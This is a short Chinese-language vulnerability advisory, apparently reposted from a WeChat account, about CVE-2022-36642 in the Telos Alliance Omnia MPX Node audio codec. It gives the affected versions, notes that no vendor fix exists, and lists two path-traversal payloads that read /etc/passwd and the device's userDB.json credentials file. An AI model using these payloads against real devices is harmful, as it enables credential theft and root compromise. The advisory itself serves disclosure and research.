免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
聚合网络安全,存储安全技术文章,融合安全最新讯息
01
漏洞简介
Telos Alliance Omnia MPX Node是美国Telos Alliance公司的一个专用硬件编解码器。能够利用 Omnia μMPXTM 算法以低至 320 kbps 的数据速率发送或接收完整的 FM 信号,非常适合容量有限的网络(包括 IP 无线电)。
该漏洞源于/appConfig/userDB.json 存在本地文件泄露漏洞。攻击者利用该漏洞提升权限到 root 并执行任意命令。
02
影响范围
Telos Alliance Omnia MPX Node 1.5.0+r1版本及之前版本
03
漏洞复现
payload:/logs/downloadMainLog?fname=../../../../../../../etc/passwd
payload:/logs/downloadMainLog?fname=../../../../../../../config/MPXnode/www/appConfig/userDB.json
04
修复建议
目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:
https://www.telosalliance.com/radio-processing/audio-interfaces/omnia-mpx-node
本文章仅用于学习交流,不得用于非法用途
原文始发于微信公众号(才疏学浅的H6):(CVE-2022-36642)Telos Alliance Omnia MPX Node 信息泄露漏洞
评论